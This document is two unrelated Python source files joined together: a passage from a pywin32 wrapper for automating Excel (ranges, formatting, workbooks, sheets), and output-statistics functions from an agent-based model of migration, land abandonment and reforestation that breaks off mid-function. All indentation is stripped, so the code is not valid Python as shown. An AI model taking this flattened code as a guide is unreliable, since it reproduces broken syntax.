"""
import re
if columns:
names = self.range.Rows[1].Value[0]
else:
names = list(zip(*self.range.Columns[1].Value))[0]
instr = ''
for k, v in fmt_dict.items():
matcher = re.compile(k)
for nm in names:
if matcher.search(nm) is not None:
idx = names.index(nm) + 1
if columns:
self.range.Columns[idx].NumberFormat=v
else:
self.range.Rows[idx].NumberFormat = v
for k, v in cw_dict.items():
matcher = re.compile(k)
for nm in names:
if matcher.search(nm) is not None:
idx = names.index(nm) + 1
if columns:
self.range.Columns[idx].ColumnWidth=v
else:
self.range.Rows[idx].RowHeight = v
def freeze_panes(self):
"""
freezes panes at upper left cell of range
:return:
"""
self.range.Select()
self.sheet.workbook.app.ActiveWindow.FreezePanes = True
def color_scale(self, vmin=5, vmed=50, vmax=95, cv=5):
"""
TODO
apply 3 color scale formatting
:param vmin: minimum value
:param vmed: median value
:param vmax: maximum value
:param cv: a number that determines what "value" in the previous params is, from the following list
5 Percentile is used. (default)
7 The longest data bar is proportional to the maximum value in the range.
6 The shortest data bar is proportional to the minimum value in the range.
4 Formula is used.
2 Highest value from the list of values.
1 Lowest value from the list of values.
-1 No conditional value.
0 Number is used.
3 Percentage is used.
:return:
"""
return
self.select()
macro = '"ColorScale" arg1 %f arg2 %f arg3 %f arg4 %i' % (vmin, vmed, vmax, cv)
ascript = '''
run XLM macro %s
''' % macro
return _asrun(ascript)
def select(self):
"""
select the range
:return:
"""
self.range.Select()
def highlight(self, condition='==', threshold=0.0, interiorcolor=(255, 0, 0)):
"""
TODO
highlight cells satisfying given condition
:param condition: one of ==,!=,>,<,>=,<=
:param threshold: a number
:param interiorcolor: an RGB triple specifying the color, eg [255,0,0] is red
:return:
"""
return
dest = self._build_dest()
ascript = '''
%s
tell rng
try
delete (every format condition)
end try
set newFormatCondition to make new format condition at end with properties {format condition type: cell value, condition operator:operator %s, formula1:%f}
set color of interior object of newFormatCondition to {%s}
end tell
'''
cond = {'==': 'equal', '!=': 'not equal', '>': 'greater', '<': 'less', '>=': 'greater equal',
'<=': 'less equal'}
ascript = ascript % (dest, cond[condition], threshold, str(interiorcolor)[1:-1])
return _asrun(ascript)
def col_dict(self):
"""
given a range with a header row,
return a dictionary of range objects, each representing a column of the current range
:return: dict, where keys are header strings, while values are column range objects
"""
out = {}
hdr = self.row(1).value()[0]
c1, r1, c2, r2 = _a2cr(self.address)
for n, c in zip(hdr, range(c1, c2 + 1)):
na = _cr2a(c, r1 + 1, c, r2)
out[n] = Rng(address=na, sheet=self.sheet)
return out
def autofit_rows(self):
"""
autofit row height
:return:
"""
self.range.EntireRow.AutoFit()
def autofit_cols(self):
"""
autofit column width
:return:
"""
self.range.EntireColumn.AutoFit()
def entire_row(self):
"""
get entire row(s) of current range
:return: new object
"""
c = _a2cr(self.address)
if len(c) == 2: c += c
cc = '%s:%s' % (c[1], c[3])
return Rng(address=cc, sheet=self.sheet)
def entire_col(self):
"""
get entire row(s) of current range
:return: new object
"""
c = _a2cr(self.address)
if len(c) == 2: c += c
cc = '%s:%s' % (_n2x(c[0]), _n2x(c[2]))
return Rng(address=cc, sheet=self.sheet)
def activate(self):
"""
activate range
:return:
"""
self.sheet.ws.Activate()
self.range.Activate()
def propagate_format(self, col=True):
"""
TODO
propagate formatting of first column (row) to subsequent columns (rows)
:param col: True for columns, False for rows
:return:
"""
return
def font_format(self, bold=False, italic=False, name='Calibri', size=12, color=(0, 0, 0)):
"""
set properties of range fonts
:param bold: true/false
:param italic: true/false
:param name: a font name, such as Calibri or Courier
:param size: number
:param color: RGB triplet
:return: a list of current font properties
"""
self.range.Font.Bold = bold
self.range.Font.Italic = italic
self.range.Font.Name = name
self.range.Font.Size = size
self.range.Font.Color = _rgb2xlcol(color)
def outline(self, boundaries):
"""
group rows as defined by boundaries object
:param boundaries: dictionary, where keys are group "main level" and values is a list of two
identifying subrows referring to main level
:return:
"""
self.sheet.ws.Outline.SummaryRow = 0
for k, [f, l] in boundaries.items():
r = self.offset(r=f).resize(r=l - f + 1).entire_row()
r.range.Group()
r = self.offset(r=k).row(1)
r.range.Font.Bold=True
def show_levels(self, n=2):
"""
set level of outline to show
:param n:
:return:
"""
self.sheet.ws.Outline.ShowLevels(RowLevels=n)
def goal_seek(self, target, r_mod):
"""
TODO
set value of range of self to target by changing range r_mod
:param target: the target value for current range
:param r_mod: the range to modify, or an integer with the column offset from the current cell
:return:
"""
return
dest = self._build_dest()
if isinstance(r_mod, int):
dest2 = self.offset(0, r_mod)._build_dest('rng2')
else:
dest2 = self.arng(r_mod)._build_dest('rng2')
ascript = """
%s
%s
goal seek rng goal %f changing cell rng2
""" % (dest, dest2, target)
return _asrun(ascript)
def paste_fig(self, figpath, w, h):
"""
paste a figure from a file onto an excel sheet, setting width and height as specified
location will be the top left corner of the current range
:param figpath: posix path of file
:param w: width in pixels
:param h: height in pixels
:return:
"""
obj1 = self.sheet.ws.Pictures().Insert(figpath)
#obj1.ShapeRange.LockAspectRatio = _pywintypes.msoTrue
obj1.Left = self.range.Left
obj1.Top = self.range.Top
obj1.ShapeRange.Width = w
obj1.ShapeRange.Height = h
#obj1.Placement = 1
#obj1.PrintObject = True
def subrng(self, t, l, nr=1, nc=1):
"""
given a range returns a subrange defined by relative coordinates
:param t: row offset from current top row
:param l: column offset from current top column
:param nr: number of rows in subrange
:param nc: number of columns in subrange
:return: range object
"""
coords = _a2cr(self.address)
newaddr = _cr2a(coords[0] + l, coords[1] + t, coords[0] + l + nc-1, coords[1] + t + nr-1)
return Rng(address=newaddr, sheet=self.sheet)
def subtotal(self, groupby, totals, aggfunc='sum'):
"""
TODO
:param groupby:
:param totals:
:param aggfunc:
:return:
"""
return
funcs = ['sum', 'count', 'average', 'maximum', 'minimum', 'product', 'standard deviation']
assert aggfunc in funcs, "aggfunc must be in " + str(funcs)
dest = self._build_dest()
ascript = '''
%s
set r1 to value of row 1 of rng
return my flatten(r1)
''' % dest
names = _parse_aslist(_asrun(ascript))
igroupby = names.index(groupby) + 1
itotals = [str(names.index(t) + 1) for t in totals]
ascript = '''
%s
subtotal rng group by %i function do %s total list {%s} summary below data summary above
''' % (dest, igroupby, aggfunc, ','.join(itotals))
return _asrun(ascript)
def size(self):
"""
return size of range
:return: columns, rows
"""
temp=_a2cr(self.address)
return temp[2]-temp[0]+1,temp[3]-temp[1]+1
class Excel():
"""
basic wrapper of Excel application, providing some methods to perform simple automation, such as
creating/opening/closing workbooks
"""
def __repr__(self):
"""
print out coordinates of the range object
:return:
"""
return 'Excel application, currently %i workbooks are open' % len(self.workbooks)
def __init__(self):
self.app=_win.gencache.EnsureDispatch('Excel.Application')
self.app.Visible = True
self.workbooks = []
self._calculation_manual = False
self.refresh_workbook_list()
def refresh_workbook_list(self):
"""
make sure that object is consistent with current state of excel
this needs to be called if, during an interactive session, users create/delete workbooks manually,
as the Excel object has no way to know what the user does
:return:
"""
self.workbooks = []
for wb in self.app.Workbooks:
wbo=Workbook(existing=wb,parent=self,name=wb.Name)
def active_workbook(self):
"""
return the active workbook
:return:
"""
try:
wb=self.app.ActiveWorkbook
return Workbook(existing=wb,parent=self,name=wb.Name)
except:
raise Exception('no workbook currently open')
def active_range(self):
"""
return the active range
:return:
"""
try:
wb = self.app.ActiveWorkbook
ws = self.app.ActiveSheet
r = self.app.Selection
wbo=self.get_wb(wb.Name)
wso=wbo.get_sheet(ws.Name)
return Rng(address=r.GetAddress(0,0), sheet=wso)
except:
raise Exception('no workbook currently open')
def create_wb(self, name='Workbook.xlsx'):
"""
create a new workbook
:return:
"""
return Workbook(parent=self)
def get_wb(self, name):
"""
get a reference to a workbook based on its name
:param name:
:return:
"""
for i, wb in enumerate(self.workbooks):
if wb.name == name:
break
if len(self.workbooks) == 0 or i > len(self.workbooks):
raise Exception("there is no workbook %s" % name)
else:
return wb
def calculation(self, manual=True):
"""
set calculation and screenupdating of excel to manual or automatic
:param manual:
:return:
"""
self.app.Calculation = _win.constants.xlManual if manual else _win.constants.xlAutomatic
def open_wb(self, fpath):
"""
open a workbook given its path
:param fpath:
:return:
"""
# self.app.Workbooks.Open(fpath)
# wb = Workbook(existing=_os.path.basename(fpath), parent=self)
wb = Workbook(existing=self.app.Workbooks.Open(fpath), parent=self)
wb.refresh_sheet_list()
return wb
class Workbook():
"""
an object representing an Excel workbook, and providing a few methods to automate it
"""
def __repr__(self):
"""
print out coordinates of the range object
:return:
"""
return "Workbook object '%s', has %i sheets" % (self.name, len(self.sheets))
def __init__(self, existing=None, parent=None, name=None):
self.wb=None
self.name = None
self.parent = None
self.sheets = []
self.existing_wb = existing
if parent is not None:
self.parent = parent
elif self.parent is None:
self.parent = Excel()
if existing is None:
wb=self.parent.app.Workbooks.Add()
if name is not None: wb.Name=name
self.wb=wb
self.name = wb.Name
else:
self.wb=existing
self.name = existing.Name
self.refresh_sheet_list()
self.parent.workbooks.append(self)
def create_sheet(self, name='Sheet'):
"""
create a new sheet in the current workbook
:param name:
:return:
"""
return Sheet(name=name, workbook=self)
def refresh_sheet_list(self):
"""
make sure that object is consistent with current state of excel
this needs to be called if, during an interactive session, users create/delete sheets manually,
as the Excel object has no way to know what the user does
:return:
"""
self.sheets=[]
for ws in self.parent.app.Worksheets:
Sheet(existing=ws, workbook=self)
def saveas(self, fpath):
"""
save a workbook into a different file (silently overwrites existing file with same name!!!)
:param fpath:
:return:
"""
self.parent.app.DisplayAlerts = False
self.wb.SaveAs(fpath)
self.parent.app.DisplayAlerts = True
self.name = _os.path.basename(fpath)
def save(self, fpath=None):
"""
save workbook
:param fpath:
:return:
"""
if self.existing_wb is None:
self.saveas(fpath=fpath)
else:
self.parent.app.DisplayAlerts = False
self.wb.Save()
self.parent.app.DisplayAlerts = True
def close(self):
"""
close a workbook without saving it
:return:
"""
self.wb.Close()
self.parent.refresh_workbook_list()
def get_sheet(self, name):
"""
get a reference to a sheet object given a name
:param name:
:return:
"""
for i, sh in enumerate(self.sheets):
if sh.name == name:
break
if len(self.sheets) == 0 or i > len(self.sheets):
raise Exception("there is no sheet %s" % name)
else:
return sh
class Sheet():
"""
an object representing an Excel sheet, and providing a few methods to automate it
"""
def __repr__(self):
"""
:return:
"""
return "Worksheet object %s, owned by '%s'" % (self.name, self.workbook.name)
def __init__(self, existing=None, workbook=None, name=None):
self.workbook = None
self.ws = None #reference to the actual worksheet object
self.name = None
self.rng = None
self.cell_data = {}
self.cell_formats = {}
if workbook is None:
self.workbook = Workbook(name='WB_'+name)
existing = self.workbook.sheets[0].name
else:
self.workbook = workbook
if existing is None:
uname=name
slist = [ws.name for ws in self.workbook.sheets]
i = 0
while uname in slist:
i += 1
uname = name + '(%i)' % i
ws = self.workbook.wb.Worksheets.Add()
ws.Name = uname
self.ws=ws
self.name = self.ws.Name
else:
self.ws = existing
self.name =self.ws.Name
self.rng = Rng('A1', sheet=self)
self.workbook.sheets.append(self)
def arng(self, address=None, row=None, col=None):
"""
access a range on the sheet, providing either address in A1 format, or a row and/or a column
:param address: string in A1 format
:param row: integer, 1-based
:param col: integer, 1-based
:return:
"""
self.rng = Rng(address=address, row=row, col=col, sheet=self)
return self.rng
def rename(self, name):
"""
change the name of the current sheet
:param name:
:return:
"""
uname = name
slist = [ws.name for ws in self.workbook.sheets]
i = 0
while uname in slist:
i += 1
uname = name + '(%i)' % i
self.ws.Name = uname
self.name = uname
def unprotect(self):
"""
remove protection (only if no password!)
:return:
"""
pass
def protect(self):
"""
activate protection (without password!)
:return:
"""
pass
def delete_shapes(self):
"""
delete all shape objects on the current sheet
:return:
"""
pass
# def get_values_formulas_formats(self, *rngs):
# """
# traverses a range and returns its contents as a dictionary
# keys are cell addresses, values are content, formulas and formats
#
# :param rngs: one or more range addresses
# :return: 3 dicts
# """
# pass
def set_values_formulas_formats(self, values_dict=None, formats_dict=None,
formulas_dict=None, arrformulas_dict=None):
"""
traverses a range and sets its contents from a dictionary
keys are cell addresses, values are content, formulas and formats
:param values_dict:
:param formats_dict:
:param formulas_dict:
:param arrformulas_dict:
:return:
"""
if values_dict is not None:
for addr, v in values_dict.items():
self.cell_data[addr]=v
if formats_dict is not None:
for addr, v in formats_dict.items():
if addr not in self.cell_formats.keys(): self.cell_formats[addr]={}
self.cell_formats[addr] = v
if formulas_dict is not None:
for addr, v in formulas_dict.items():
if addr not in self.cell_formats.keys(): self.cell_formats[addr]={}
self.cell_formats[addr] = v
if arrformulas_dict is not None:
for addr, v in arrformulas_dict.items():
if addr not in self.cell_formats.keys(): self.cell_formats[addr]={}
self.cell_formats[addr] = '{'+v+'}'
def copy_ws_to_wb(self,target_wb,after=True,sheet_num=0):
from copy import copy
if after:
self.ws.Copy(After=target_wb.get_sheet(sheet_num).ws)
else:
self.ws.Copy(Before=target_wb.get_sheet(sheet_num).ws)
def _rgb2xlcol(rgb):
"""
converts an rgb tuple into a color index as expected by excel
:param rgb:
:return:
"""
strValue = '%02x%02x%02x' % tuple(rgb)
iValue = int(strValue, 16)
return iValue
def _parse_windates(v):
"""
takes a value, a list or a list of list and replaces any pywintypes dates into datetime objects
:param v:
:return:
"""
if isinstance(v,(list,tuple)):
out=list(v)
for i in range(len(v)):
out[i] =_parse_windates(v[i])
else:
out=v
if isinstance(out, _pywintypes.TimeType):
out = _datetime.datetime(v.year, v.month, v.day, v.hour, v.minute, v.second)
return out
def _dt2pywintime(d):
tz=_pytz.timezone('utc')
if isinstance(d,_datetime.datetime):
out = _pywintypes.TimeType(d.year, d.month, d.day, d.hour, d.minute, d.second, tzinfo=tz)
elif isinstance(d,_datetime.date):
out=_pywintypes.TimeType(d.year,d.month,d.day,tzinfo=tz)
else:
out=d
return out
def _fix_4_win(ll):
if isinstance(ll,(list,tuple)):
out=list(ll)
for i in range(len(ll)):
out[i]=_fix_4_win(out[i])
else:
if isinstance(ll,(_datetime.datetime,_datetime.date)):
out=_dt2pywintime(ll)
else:
out=ll
return out |
""" ABM-CALM: Qi Zhang (qz@unc.edu;qz@bu.edu) """
### Output Functions [awrite.py] ####
"""
O-Function 0a: Write dataframe headlines
O-Function 0b: Write initialized agent attributes
O-Function 1a: Derive stats for population
O-Function 1b: Write out stats for migration
O-Function 2a: Store stats of farm plot (area)
O-Function 2b: Write out stats for abandonment (area)
O-Function 3a: Store stats of ccfp plots (area)
O-Function 3b: Write out stats for planting (area)
O-Function 4a: Write out stats for collective action
O-Function 4b: Compare collective stats for learned and indigenous
O-Function 5: Derive and write status of each tick
"""
""" O-Function 0a: Write dataframe headlines """
def df_head(dfType):
# dfType = 'mig', 'ret', 'aba', 'rec', 'ren', 'pla', 'rev'
# dfType = 'staMig', 'staAba', 'staPla', 'staCol', 'staFin'
# b1 - individual: migrate
if dfType == 'mig':
l1 = ['Mig!', 'tick', 'pid', 'hhid', 'rgid', 'villid']
l2 = ['relateHead', 'ifFemale', 'age', 'ifMarried', 'numChild']
l3 = ['ifOutMig', 'ifRetMig', 'ifEverOut', 'work', 'edu']
l4 = ['ifCcfp', 'ifCcfpO', 'rand', 'probMig']
rl = l1 + l2 + l3 + l4
# b2 - individual: return
if dfType == 'ret':
l1 = ['Ret!', 'tick', 'pid', 'hhid', 'rgid', 'villid']
l2 = ['relateHead', 'ifFemale', 'age', 'ifMarried', 'numChild']
l3 = ['ifOutMig', 'ifRetMig', 'ifEverOut', 'work', 'edu']
l4 = ['ifCcfp', 'ifCcfpO', 'r', 'pReturn']
rl = l1 + l2 + l3 + l4
# b3 - plot: be abandoned
if dfType == 'aba':
l1 = ['Aba!', 'tick', 'plid', 'hhid', 'rgid', 'villid']
l2 = ['centerX', 'centerY', 'area', 'code', 'dry', 'elev', 'slope']
l3 = ['aspect', 'twi', 'distCcfp', 'distEwfp', 'distEwfpO']
l4 = ['geoDist', 'abanYr', 'ifCcfp', 'ifCcfpO', 'rand', 'probAba']
rl = l1 + l2 + l3 + l4
# b4 - plot: be reclaimed
if dfType == 'rec':
l1 = ['Rec!', 'tick', 'plid', 'hhid', 'rgid', 'villid']
l2 = ['centerX', 'centerY', 'area', 'code', 'dry', 'elev', 'slope']
l3 = ['aspect', 'twi', 'distCcfp', 'distEwfp', 'distEwfpO']
l4 = ['geoDist', 'abanYr', 'ifCcfp', 'ifCcfpO', 'r', 'pReclaim']
rl = l1 + l2 + l3 + l4
# b5 - plot: be rented-out or -in
if dfType == 'ren':
l1 = ['Ren!', 'tick', 'plid', 'hhid', 'rgid', 'villid']
l2 = ['centerX', 'centerY', 'area', 'code', 'dry', 'elev', 'slope']
l3 = ['aspect', 'twi', 'distCcfp', 'distEwfp', 'distEwfpO']
l4 = ['geoDist', 'abanYr', 'ifCcfp', 'ifCcfpO', 'r', 'pRent']
l5 = ['hhidOu', 'hhidIn']
rl = l1 + l2 + l3 + l4 + l5
# b6 - plot: be planted
if dfType == 'pla':
l1 = ['Pla!', 'tick', 'plid', 'hhid', 'rgid', 'villid']
l2 = ['centerX', 'centerY', 'area', 'code', 'dry', 'elev', 'slope']
l3 = ['aspect', 'twi', 'distCcfp', 'distEwfp', 'distEwfpO']
l4 = ['geoDist', 'abanYr', 'ifCcfp', 'ifCcfpO', 'rand','probPla','cRG']
l5 = ['propActPl', 'areActPl', 'areTotPl']
l6 = ['percActGp', 'numActGp', 'numTotGp']
rl = l1 + l2 + l3 + l4 + l5 + l6
# b7 - plot: be reverted
if dfType == 'rev':
l1 = ['Rev!', 'tick', 'plid', 'hhid', 'rgid', 'villid']
l2 = ['centerX', 'centerY', 'area', 'code', 'dry', 'elev', 'slope']
l3 = ['aspect', 'twi', 'distCcfp', 'distEwfp', 'distEwfpO']
l4 = ['geoDist', 'abanYr', 'ifCcfp', 'ifCcfpO', 'r', 'pRevert']
rl = l1 + l2 + l3 + l4
# s1 - demographics for migration(individual)
if dfType == 'staMig':
l1 = ['StaMig!' ,'tick']
l2 = ['percMig' ,'percMig1','percMig0']
l3 = ['numMig' ,'numMig1' ,'numMig0', 'numPop' ,'numPop1','numPop0']
l4 = ['percRet' ,'percRet1','percRet0']
l5 = ['numRet' ,'numRet1' ,'numRet0', 'numCur' ,'numCur1','numCur0']
l6 = ['percMigL','percMigI','numMigL', 'numMigI','numPopL','numPopI']
l7 = ['percRetL','percRetI','numRetL', 'numRetI','numCurL','numCurI']
rl = l1 + l2 + l3 + l4 + l5 + l6 + l7
# s2 - lands for abandonment (plot)
if dfType == 'staAba':
l1 = ['StaAba!' ,'tick']
l2 = ['propAba' ,'propAba1','propAba0']
l3 = ['areAba' ,'areAba1' ,'areAba0', 'arePlo' ,'arePlo1','arePlo0']
l4 = ['propRec' ,'propRec1','propRec0']
l5 = ['areRec' ,'areRec1' ,'areRec0', 'areCur' ,'areCur1','areCur0']
l6 = ['propAbaL','propAbaI','areAbaL', 'areAbaI','arePloL','arePloI']
l7 = ['propRecL','propRecI','areRecL', 'areRecI','areCurL','areCurI']
rl = l1 + l2 + l3 + l4 + l5 + l6 + l7
# s3 - lands for tree planting (plot)
if dfType == 'staPla':
l1 = ['StaPla!' ,'tick']
l2 = ['propPla' ,'propPla1','propPla0']
l3 = ['arePla' ,'arePla1' ,'arePla0', 'areAPs' ,'areAPs1','areAPs0']
l4 = ['propRev' ,'propRev1','propRev0']
l5 = ['areRev' ,'areRev1' ,'areRev0', 'areCCs' ,'areCCs1','areCCs0']
l6 = ['propPlaL','propPlaI','arePlaL', 'arePlaI','areAPsL','areAPsI']
l7 = ['propRevL','propRevI','areRevL', 'areRevI','areCCsL','areCCsI']
rl = l1 + l2 + l3 + l4 + l5 + l6 + l7
# s4 - collective action of reforestation (social norm)
if dfType == 'staCol':
l1 = ['StaCol!','tick','rPlAb','arePl','areAb','m_probPla','m_cRG']
l2 = ['m_propActPl', 'm_areActPl', 'm_areTotPl']
l3 = ['m_percActGp', 'm_numActGp', 'm_numTotGp']
rl = l1 + l2 + l3
# s5 - collective: learned vs indigenous
if dfType == 'staCom':
l1 = ['StaCom!', 'tick']
l2 = ['rPlAbL' , 'arePlL', 'areAbL', 'm_probPlaL' , 'm_cRGL']
l3 = ['m_propActPlL', 'm_areActPlL', 'm_areTotPlL']
l4 = ['m_percActGpL', 'm_numActGpL', 'm_numTotGpL']
l5 = ['rPlAbI', 'arePlI', 'areAbI' , 'm_probPlaI' , 'm_cRGI']
l6 = ['m_propActPlI', 'm_areActPlI', 'm_areTotPlI']
l7 = ['m_percActGpI', 'm_numActGpI', 'm_numTotGpI']
rl = l1 + l2 + l3 + l4 + l5 + l6 + l7
# s6 - final status of each tick
if dfType == 'staFin':
l1 = ['staFin!', 'tick']
l2 = ['ind' , 'pop', 'cur', 'ret' , 'ever']
l3 = ['land', 'cul', 'aba', 'ccf' , 'zcul', 'zaba', 'zccf']
l4 = ['hhs' , 'hh1', 'hh0', 'zhh1', 'zhh0']
l5 = [ 'hhL', 'hhI', 'zhhL', 'zhhI']
rl = l1 + l2 + l3 + l4 + l5
# i1 - initilized individual attributes
if dfType == 'iniINs':
l1 = ['pid', 'hhid', 'rgid', 'villid', 'relateHead', 'ifFemale']
l2 = ['age', 'ifMarried', 'numChild', 'ifOutMig', 'ifRetMig']
l3 = ['ifEverOut', 'work', 'edu', 'ifCcfp', 'ifCcfpO']
rl = l1 + l2 + l3
# i2 - initilized plot features
if dfType == 'iniPLs':
l1 = ['plid', 'hhid', 'rgid', 'villid', 'centerX','centerY', 'area']
l2 = ['code', 'dry', 'elev', 'slope', 'aspect', 'twi', 'distCcfp']
l3 = ['distEwfp','distEwfpO','geoDist','abanYr','ifCcfp','ifCcfpO']
rl = l1 + l2 + l3
# i3 - initilized household characteristics
if dfType == 'iniHHs':
l1 = ['hhid', 'rgid', 'villid', 'hhLocX', 'hhLocY', 'hhElev']
l2 = ['hdIfFemale', 'hdAge', 'hdEdu', 'hdIfMarried']
l3 = ['hhSize', 'hhNumCurOut', 'hhNumPreOut', 'hhLandOwn']
l4 = ['hhLandPlant', 'areaCcfp', 'areaEwfp', 'ifCcfp', 'ifCcfpO', 'sn']
rl = l1 + l2 + l3 + l4
# return to column names
return rl
""" O-Function 0b: Write initialized agent attributes """
def tp_attr(df, inList, plList, hhList, agType):
# df = df_ini_ins, df_ini_pls, df_ini_hhs
# inList=aglistINs, plList=aglistPLs, hhList=aglistHHs
# agType = 'ins', 'pls', 'hhs'
# inidividuals
if agType == 'ins':
for aIN in inList:
df.loc[len(df)] = aIN.write_self()
# plots
if agType == 'pls':
for aPL in plList:
df.loc[len(df)] = aPL.write_self()
# households
if agType == 'hhs':
for aHH in hhList:
df.loc[len(df)] = aHH.write_self()
# return to dataframe
return df
""" O-Function 1a: Derive stats for population """
def stat_in_pop(inList):
# inList=aglistINs
# demographics:
# numPop, numPop1, numPop0, numCur, numCur1, numCur0
# numPopL, numPopI, numCurL, numCurI
# get list of non-migrants only
l_non = [a for a in inList if a.ifOutMig==0]
# stats: population of non-migrants, by CCFP
numPop = len(l_non) # total
numPop1 = len([a for a in l_non if a.ifCcfp==1]) # ccfp = 1
numPop0 = len([a for a in l_non if a.ifCcfp==0]) # ccfp = 0
# get list of current migrants only
l_cur = [a for a in inList if a.ifOutMig==1]
# stats: population of non-migrants, by CCFP
numCur = len(l_cur) # total
numCur1 = len([a for a in l_cur if a.ifCcfp==1]) # ccfp = 1
numCur0 = len([a for a in l_cur if a.ifCcfp==0]) # ccfp = 0
# derive indigenous and learned CCFP household population
numPopL = len([a for a in l_non if a.ifCcfp==1 and a.ifCcfpO==0])
numPopI = len([a for a in l_non if a.ifCcfp==1 and a.ifCcfpO==1])
numCurL = len([a for a in l_cur if a.ifCcfp==1 and a.ifCcfpO==0])
numCurI = len([a for a in l_cur if a.ifCcfp==1 and a.ifCcfpO==1])
# add all to list
rl1 = [numPop, numPop1, numPop0, numCur, numCur1, numCur0]
rl2 = [ numPopL, numPopI, numCurL, numCurI]
# return to lStatIN
return rl1 + rl2
""" O-Function 1b: Write out stats for migration """
def stat_in_mig(u1, u2, l, ls):
# u1=upd_mig, u2=upd_ret, l=aglistINs, ls=lStatIN
# ls=lStatIn =
# [numPop, numPop1, numPop0, numCur, numCur1, numCur0
# numPopL, numPopI, numCurL, numCurI]
# demographics:
# percMig , percMig1, percMig0, numMig, numMig1, numMig0,
# numPop , numPop1 , numPop0
# percRet , percRet1, percRet0, numRet, numRet1, numRet0,
# numCur , numCur1 , numCur0
# percMigL, percMigI, numMigL, numMigI, numPopL, numPopI
# percRetL, percRetI, numRetL, numRetI, numCurL, numCurI
# number of people who decide to migrate out
numMig = len(u1)
numMig1 = len([a for a in l if a.pid in u1 and a.ifCcfp==1])
numMig0 = len([a for a in l if a.pid in u1 and a.ifCcfp==0])
# percent
percMig = numMig / ls[0] if ls[0] > 0 else -9 # numPop
percMig1 = numMig1 / ls[1] if ls[1] > 0 else -9 # numPop1
percMig0 = numMig0 / ls[2] if ls[2] > 0 else -9 # numPop0
# number of people who decide to return home
numRet = len(u2)
numRet1 = len([a for a in l if a.pid in u2 and a.ifCcfp==1])
numRet0 = len([a for a in l if a.pid in u2 and a.ifCcfp==0])
# percent
percRet = numRet / ls[3] if ls[3] > 0 else -9 # numCur
percRet1 = numRet1 / ls[4] if ls[4] > 0 else -9 # numCur1
percRet0 = numRet0 / ls[5] if ls[5] > 0 else -9 # numCur0
# derive stats for indigenous vs learned
# number of migrating out
numMigL=len([a for a in l if a.pid in u1 and a.ifCcfp==1 and a.ifCcfpO==0])
numMigI=len([a for a in l if a.pid in u1 and a.ifCcfp==1 and a.ifCcfpO==1])
# percent
percMigL = numMigL / ls[6] if ls[6] > 0 else -9 # numPopL
percMigI = numMigI / ls[7] if ls[7] > 0 else -9 # numPopI
# number of returning home
numRetL=len([a for a in l if a.pid in u2 and a.ifCcfp==1 and a.ifCcfpO==0])
numRetI=len([a for a in l if a.pid in u2 and a.ifCcfp==1 and a.ifCcfpO==1])
# percent
percRetL = numRetL / ls[8] if ls[8] > 0 else -9 # numCurL
percRetI = numRetI / ls[9] if ls[9] > 0 else -9 # numCurI
# store in a list: 9 + 9 # !! note the order !!
# migrate out
rl1 = [percMig, percMig1, percMig0, numMig, numMig1, numMig0] + ls[0:3]
# return home
rl2 = [percRet, percRet1, percRet0, numRet, numRet1, numRet0] + ls[3:6]
# indigenous vs learned
rl3 = [percMigL, percMigI, numMigL, numMigI] + ls[6:8]
rl4 = [percRetL, percRetI, numRetL, numRetI] + ls[8: ]
# return to al
return rl1 + rl2 + rl3 + rl4
""" O-Function 2a: Store stats of farm plot (area) """
def stat_fp_plo(plList):
# plList = aglistPLs
# plots (area):
# arePlo , arePlo1, arePlo0, areCur, areCur1, areCur0
# arePloL, arePloI, areCurL, areCurI
# get list of cultivated plots only
l_cul = [a for a in plList if a.code in [60,61]]
# stats: area of planted plots, by CCFP
arePlo = sum([a.area for a in l_cul]) # total
arePlo1 = sum([a.area for a in l_cul if a.ifCcfp==1]) # ccfp = 1
arePlo0 = sum([a.area for a in l_cul if a.ifCcfp==0]) # ccfp = 0
# get list of abandoned plots only
l_cur = [a for a in plList if a.code in [69]]
# stats: area of non-migrants, by CCFP
areCur = sum([a.area for a in l_cur]) # total
areCur1 = sum([a.area for a in l_cur if a.ifCcfp==1]) # ccfp = 1
areCur0 = sum([a.area for a in l_cur if a.ifCcfp==0]) # ccfp = 0
# derive indigenous and learned CCFP household land area
arePloL = sum([a.area for a in l_cul if a.ifCcfp==1 and a.ifCcfpO==0])
arePloI = sum([a.area for a in l_cul if a.ifCcfp==1 and a.ifCcfpO==1])
areCurL = sum([a.area for a in l_cur if a.ifCcfp==1 and a.ifCcfpO==0])
areCurI = sum([a.area for a in l_cur if a.ifCcfp==1 and a.ifCcfpO==1])
# add all to list
rl1 = [arePlo , arePlo1, arePlo0, areCur, areCur1, areCur0]
rl2 = [arePloL, arePloI, areCurL, areCurI]
# return to lStatFP
return rl1 + rl2
""" O-Function 2b: Write out stats for abandonment (area) """
def stat_fp_aba(u1, u2, l, ls):
# u1=upd_aba, u2=upd_rec, l=aglistPLs, ls=lStatFP
# ls=lStatFP =
# [arePlo, arePlo1, arePlo0, areCur, areCur1, areCur0
# arePloL, arePloI, areCurL, areCurI]
# land:
# propAba , propAba1, propAba0, areAba, areAba1, areAba0,
# arePlo , arePlo1 , arePlo0
# propRec , propRec1, propRec0, areRec, areRec1, areRec0,
# areCur , areCur1 , areCur0
# propAbaL, propAbaI, areAbaL, areAbaI, arePloL, arePloI
# propRecL, propRecI, areRecL, areRecI, areCurL, areCurI
# area of plots to be abandoned
areAba = sum([a.area for a in l if a.plid in u1])
areAba1 = sum([a.area for a in l if a.plid in u1 and a.ifCcfp==1])
areAba0 = sum([a.area for a in l if a.plid in u1 and a.ifCcfp==0])
# percent
propAba = areAba / ls[0] if ls[0] > 0 else -9 # arePlo
propAba1 = areAba1 / ls[1] if ls[1] > 0 else -9 # arePlo1
propAba0 = areAba0 / ls[2] if ls[2] > 0 else -9 # arePlo0
# area of plots to be reclaimed
areRec = sum([a.area for a in l if a.plid in u2])
areRec1 = sum([a.area for a in l if a.plid in u2 and a.ifCcfp==1])
areRec0 = sum([a.area for a in l if a.plid in u2 and a.ifCcfp==0])
# percent
propRec = areRec / ls[3] if ls[3] > 0 else -9 # areCur
propRec1 = areRec1 / ls[4] if ls[4] > 0 else -9 # areCur1
propRec0 = areRec0 / ls[5] if ls[5] > 0 else -9 # areCur0
# derive stats for indigenous vs learned
# area of being abandoned
l1 = [a for a in l if a.plid in u1]
areAbaL = sum([a.area for a in l1 if a.ifCcfp==1 and a.ifCcfpO==0])
areAbaI = sum([a.area for a in l1 if a.ifCcfp==1 and a.ifCcfpO==1])
# percent
propAbaL = areAbaL / ls[6] if ls[6] > 0 else -9 # arePloL
propAbaI = areAbaI / ls[7] if ls[7] > 0 else -9 # arePloI
# area of being reclaimed
l2 = [a for a in l if a.plid in u2]
